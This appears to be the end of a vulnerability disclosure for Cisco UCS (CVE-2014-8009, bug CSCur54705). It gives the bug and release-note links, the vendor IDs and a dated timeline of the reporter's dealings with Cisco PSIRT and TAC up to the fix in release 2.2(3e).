Bug Search (login required):  https://tools.cisco.com/bugsearch/bug/CSCur54705
Release notes for 2.2(3e):    http://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/release/notes/ucs_2_2_rn.html#21634


Associated vendor IDs:  PSIRT-1394165707  CSCur54705

Timeline:
============
2014.10.30 Reported to psirt@cisco.com
2014.11.04 Response from PSIRT, assigned PSIRT-1394165707
2014.11.06 Follow up questions from Cisco, response provided same day
2014.11.12 Status request. PSIRT responded that this had been handed to development and assigned defect id CSCur54705.
2014.12.04 As PSIRT doesn't own the bug any longer, opened TAC case requesting status.
2014.12.10 Response from Cisco TAC indicating that perhaps I should upgrade to the latest version at that time
2014.12.12 Discussion with TAC, unable to gather required status update internally, TAC case closed with my permission

2015.02.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
2015.02.05 Sent status update request to PSIRT, response was that bug was fixed internally, release pending testing, release cycle, etc.
2015.02.11 Follow up from Cisco to ensure that no additional information was required, closure of my request with my permission
2015.02.13 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
2015.03.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
2015.03.06 Update to public bug document, indicates that vulnerability is fixed in 2.2(3e)


Reference:

1 - http://tools.cisco.com/security/center/publicationListing.x
2 - http://tools.cisco.com/security/center/viewAlert.x?alertId=36640  ( CVE-2014-8009 )